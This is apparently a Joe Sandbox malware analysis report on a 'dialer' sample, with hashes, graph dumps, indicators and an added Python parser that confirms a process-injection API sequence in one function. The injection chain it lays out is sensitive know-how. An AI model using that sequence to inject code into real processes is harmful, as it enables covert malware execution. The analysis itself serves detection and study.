                                                               Success path: CreateProcessW, VirtualAllocEx, WriteProcessMemory (repeated in the 302/303 loop), VirtualAlloc, GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread, then return through 308 and 294. Every API failure edge leads to 292, which calls OpenProcess and TerminateProcess on the new process before going back through 289 and 287 to the loop head 286; from there the function either enters CreateProcessW again or leaves via 291 to the return block 294. No unmapping API (NtUnmapViewOfSection) appears in this graph.
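Added example (not part of the Joe Sandbox report): a small Python parser for the flattened `control_flow_graph` text above. It rebuilds the basic blocks and edges, lists the blocks that call imported APIs, and checks whether the injection chain the report's signatures describe for this function (CreateProcessW, VirtualAllocEx, WriteProcessMemory, GetThreadContext, SetThreadContext, ResumeThread) occurs in that order along some path. The graph text is embedded verbatim from this report; the token heuristics (node ids are short decimals, addresses are 8 or more hex digits, `call <hex>` is an internal call, everything else in a node is an API name) are assumptions about the export format, not documented Joe Sandbox behaviour.

```python
import re
from collections import defaultdict

# Constructed input: the flattened control_flow_graph text for sub_140001c88,
# copied from the report above (node id, address range, API names, then edges).
CFG_TEXT = (
    "control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 "
    "287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 "
    "287->286 291 140001e97 287->291 289 140001e88 288->289 "
    "290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 "
    "292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 "
    "294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 "
    "296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 "
    "298 140001e78-140001e83 TerminateProcess 295->298 296->289 "
    "299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 "
    "299->292 301 140001df1-140001e07 GetThreadContext 299->301 "
    "302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 "
    "304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 "
    "303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 "
    "306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 "
    "307 140001e4e-140001e5b ResumeThread 306->307 307->292 "
    "308 140001eba-140001ebf 307->308 308->294"
)

# Token heuristics (assumptions about the export format, not documented behaviour):
# node ids are short decimals, addresses are 8+ hex digits or a hex range,
# edges are "<id>-><id>", "call <hex>" is a call into another function of the
# image, and any other token inside a node is an imported API name.
NODE_RE = re.compile(r"^\d{1,7}$")
ADDR_RE = re.compile(r"^[0-9a-f]{8,}(?:-[0-9a-f]{8,})?$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

# The API chain the report's signatures describe for this function.
INJECTION_CHAIN = ["CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
                   "GetThreadContext", "SetThreadContext", "ResumeThread"]


def parse_cfg(text):
    """Parse the flattened graph into (nodes, edges).
    nodes: {id: {"addr": str, "apis": [str]}}; edges: {id: [successor ids]}."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(list)
    current = None  # node whose API list is being filled
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges[int(m.group(1))].append(int(m.group(2)))
            current = None  # APIs only follow a node's own address
            i += 1
            continue
        if NODE_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "apis": []}
            i += 2
            continue
        if tok == "call" and i + 1 < len(tokens):
            if current is not None:
                nodes[current]["apis"].append("call_" + tokens[i + 1])
            i += 2
            continue
        if current is not None:
            nodes[current]["apis"].append(tok)
        i += 1
    return nodes, dict(edges)


def api_blocks(nodes):
    """Basic blocks that call anything, sorted by address: [(addr, [apis])]."""
    return sorted((d["addr"], d["apis"]) for d in nodes.values() if d["apis"])


def sinks(nodes, edges):
    """Nodes with no successors: the function's exit blocks."""
    return sorted(n for n in nodes if not edges.get(n))


def reachable(edges, start):
    """Node ids reachable from `start` by following one or more edges
    (`start` itself is included only if it lies on a cycle)."""
    seen, stack = set(), list(edges.get(start, []))
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(edges.get(n, []))
    return seen


def has_ordered_apis(nodes, edges, sequence):
    """True if some execution path calls the APIs in `sequence` in that order
    (other calls may sit in between). Positions are (node, index in its API list)."""
    if not sequence:
        return False
    reach = {n: reachable(edges, n) for n in nodes}
    frontier = {(n, k) for n, d in nodes.items()
                for k, a in enumerate(d["apis"]) if a == sequence[0]}
    for api in sequence[1:]:
        nxt = set()
        for n, k in frontier:
            # a later call inside the same basic block
            nxt.update((n, j) for j in range(k + 1, len(nodes[n]["apis"]))
                       if nodes[n]["apis"][j] == api)
            # a call in any block reachable through the graph
            for m in reach[n]:
                nxt.update((m, j) for j, a in enumerate(nodes[m]["apis"]) if a == api)
        if not nxt:
            return False
        frontier = nxt
    return True


def missing_apis(nodes, candidates):
    """Which of `candidates` never appear anywhere in the function."""
    present = {a for d in nodes.values() for a in d["apis"]}
    return [a for a in candidates if a not in present]


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_TEXT)
    for addr, apis in api_blocks(nodes):
        print(addr, " ".join(apis))
    print("exit blocks:", sinks(nodes, edges))
    print("injection chain in order:", has_ordered_apis(nodes, edges, INJECTION_CHAIN))
    print("absent:", missing_apis(nodes, ["NtUnmapViewOfSection", "ZwUnmapViewOfSection"]))
```

The ordering check is reachability based, so the 286/287 loop around CreateProcessW makes most orderings satisfiable in this particular function; its value here is confirming the chain exists at all and that the unmap step of classic process hollowing is absent from the graph, which matches the report labelling this as PE injection into a foreign process rather than hollowing.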
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                              • String ID: @
                                                              • API String ID: 3462610200-2766056989
                                                              • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                              • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                              • String ID: dialersvc64
                                                              • API String ID: 4184240511-3881820561
                                                              • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                              • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Delete$CloseEnumOpen
                                                              • String ID: SOFTWARE\dialerconfig
                                                              • API String ID: 3013565938-461861421
                                                              • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                              • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: File$Write$CloseCreateHandle
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 148219782-3440882674
                                                              • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                              • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: ntdll.dll
                                                              • API String ID: 1646373207-2227199552
                                                              • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                              • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                              Execution Graph

                                                              Execution Coverage:2.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:899
                                                              Total number of Limit Nodes:2
                                                               execution_graph (rendered graph not reproduced; the API calls the graph attributes to each function are grouped below, and the graph text on the page is truncated at node 2553)
                                                               • 14000199e, 140001a70, 140001b36: VirtualProtect; 140001ba0 (4 API calls): VirtualQuery, VirtualProtect, memcpy, GetLastError
                                                               • 140001394 -> 140006670: malloc, then NtResetWriteWatch; 140001404 and the 14000145e .. 1400015f3 chain call 140001394 repeatedly (each step shown as "2 API calls")
                                                               • 140002104, 14000219e: EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError, DeleteCriticalSection, free; 14000216f: InitializeCriticalSection; 140002050: EnterCriticalSection, free, LeaveCriticalSection; 140001fd0: EnterCriticalSection, LeaveCriticalSection
                                                               • 140001e65, 140001f47, 140001e10: signal
                                                               • 140001800: fprintf; 140002320: strlen; 140001000: __set_app_type, then 140001e00 -> 140006c10: __setusermatherr
                                                               • 140001140 -> 140001160 (78 API calls): Sleep, _amsg_exit, _initterm, SetUnhandledExceptionFilter (via 140001880), malloc, strlen, memcpy, _cexit, plus the VirtualProtect and VirtualQuery paths above
                                                               • 140003250 (reached from 140001160): wcslen, memset, _wcsnicmp, wcscpy, wcscat, wcsstr, memcpy, malloc and NtResetWriteWatch via the 140001394 chain, and a call to 1400027d0 (11 API calls)
140001394 2 API calls 2552->2553 2554 1400015a8 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015b7 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015c6 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015d5 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015e4 2561->2562 2563 140001394 2 API calls 2562->2563 2564 1400015f3 2563->2564 2564->2369 2566 140001394 2 API calls 2565->2566 2567 1400015b7 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015c6 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015d5 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015e4 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015f3 2574->2575 2575->2369 2577 140001394 2 API calls 2576->2577 2578 14000147c 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000148b 2579->2580 2581 140001394 2 API calls 2580->2581 2582 14000149a 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014a9 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014b8 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014c7 2587->2588 2589 140001394 2 API calls 2588->2589 2590 1400014d6 2589->2590 2591 1400014e5 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014ef 2593->2594 2595 1400014f4 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 1400014fe 2597->2598 2599 140001503 2598->2599 2600 140001394 2 API calls 2598->2600 2601 140001394 2 API calls 2599->2601 2600->2599 2602 14000150d 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001512 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001521 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001530 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000153f 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000154e 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000155d 2613->2614 2615 140001394 2 API calls 
2614->2615 2616 14000156c 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000157b 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000158a 2619->2620 2621 140001394 2 API calls 2620->2621 2622 140001599 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015a8 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015b7 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015c6 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015d5 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015e4 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015f3 2633->2634 2634->2332 2635 140001530 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000153f 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000154e 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000155d 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000156c 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000157b 2644->2645 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2337 2661->2338 2663 140001394 2 API calls 2662->2663 2664 1400014b8 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014c7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400014d6 2667->2668 2669 1400014e5 2668->2669 2670 140001394 2 API calls 2668->2670 2671 140001394 2 API calls 2669->2671 2670->2669 2672 1400014ef 2671->2672 2673 1400014f4 2672->2673 2674 140001394 2 API calls 2672->2674 2675 140001394 2 API calls 2673->2675 2674->2673 2676 1400014fe 2675->2676 2677 140001503 2676->2677 
2678 140001394 2 API calls 2676->2678 2679 140001394 2 API calls 2677->2679 2678->2677 2680 14000150d 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001512 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001521 2683->2684 2685 140001394 2 API calls 2684->2685 2686 140001530 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000153f 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000154e 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000155d 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000156c 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000157b 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000158a 2697->2698 2699 140001394 2 API calls 2698->2699 2700 140001599 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015a8 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015b7 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015c6 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015d5 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015e4 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400015f3 2711->2712 2712->2347 2713 140001440 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000144f 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000145e 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000146d 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000147c 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000148b 2722->2723 2724 140001394 2 API calls 2723->2724 2725 14000149a 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014a9 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014b8 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014c7 2730->2731 2732 140001394 2 API calls 2731->2732 2733 1400014d6 2732->2733 2734 1400014e5 2733->2734 2735 140001394 2 API calls 2733->2735 2736 140001394 2 API calls 2734->2736 2735->2734 2737 1400014ef 2736->2737 2738 1400014f4 2737->2738 2739 140001394 2 API 
calls 2737->2739 2740 140001394 2 API calls 2738->2740 2739->2738 2741 1400014fe 2740->2741 2742 140001503 2741->2742 2743 140001394 2 API calls 2741->2743 2744 140001394 2 API calls 2742->2744 2743->2742 2745 14000150d 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001512 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001521 2748->2749 2750 140001394 2 API calls 2749->2750 2751 140001530 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000153f 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000154e 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000155d 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000156c 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000157b 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000158a 2762->2763 2764 140001394 2 API calls 2763->2764 2765 140001599 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015a8 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015b7 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015c6 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015d5 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015e4 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400015f3 2776->2777 2777->2347 2777->2355 2779 1400014e5 2778->2779 2780 140001394 2 API calls 2778->2780 2781 140001394 2 API calls 2779->2781 2780->2779 2782 1400014ef 2781->2782 2783 1400014f4 2782->2783 2784 140001394 2 API calls 2782->2784 2785 140001394 2 API calls 2783->2785 2784->2783 2786 1400014fe 2785->2786 2787 140001503 2786->2787 2788 140001394 2 API calls 2786->2788 2789 140001394 2 API calls 2787->2789 2788->2787 2790 14000150d 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001512 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001521 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001530 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000153f 2797->2798 2799 140001394 2 API calls 2798->2799 2800 
14000154e 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000155d 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000156c 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000157b 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000158a 2807->2808 2809 140001394 2 API calls 2808->2809 2810 140001599 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015a8 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015b7 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015c6 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015d5 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015e4 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015f3 2821->2822 2822->2386 2824 140001394 2 API calls 2823->2824 2825 140001530 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000153f 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000154e 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000155d 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000156c 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000157b 2834->2835 2836 140001394 2 API calls 2835->2836 2837 14000158a 2836->2837 2838 140001394 2 API calls 2837->2838 2839 140001599 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015a8 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015b7 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015c6 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015d5 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015e4 2848->2849 2850 140001394 2 API calls 2849->2850 2851 1400015f3 2850->2851 2851->2386 2853 140001394 2 API calls 2852->2853 2854 140001431 2853->2854 2855 140001394 2 API calls 2854->2855 2856 140001440 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000144f 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000145e 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000146d 2861->2862 2863 140001394 2 API calls 
2862->2863 2864 14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2386 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000144f 
2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 2986 140001394 2 API calls 
2985->2986 2987 1400015f3 2986->2987 2987->2386

                                                              Callgraph


                                                              Control-flow Graph

                                                              APIs
                                                              • NtResetWriteWatch.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: ResetWatchWrite
                                                              • String ID:
                                                              • API String ID: 473789334-0
                                                              • Opcode ID: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                              • Instruction ID: d3c3cf79118e968cc42332799ff90b96b74b9ead5fc78a259f0acec360665963
                                                              • Opcode Fuzzy Hash: db3a2adbfd885308611a8e34f6847f87a6f17780172e7325b61373531d395d4d
                                                              • Instruction Fuzzy Hash: 35F09DB6608B408AEA12DB62F85179A77A5F38C7C0F009919BBC853735DB38C190CB40

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
